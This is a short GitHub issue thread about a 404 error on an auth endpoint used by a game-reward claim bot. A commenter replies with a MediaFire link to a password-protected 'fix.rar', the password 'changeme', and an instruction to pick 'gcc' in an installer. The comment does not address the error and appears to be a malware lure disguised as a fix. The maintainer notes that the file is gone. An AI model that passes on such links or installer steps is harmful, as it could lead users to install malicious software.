### ISSUE TITLE
City Holders 404 Not Found: POST https://api.city-holder.com/auth

### ISSUE THREAD

**Issue by m0nclous** [m0nclous/click-claim-bot#116]
"message":"Request failed with status code 404 Not Found: POST https://api.city-holder.com/auth"
"name":"HTTPError"

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by m0nclous** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

The key you provided for file access was invalid. This is usually caused because the file is no longer stored on MediaFire. This occurs when the file is removed by the originating user or MediaFire.
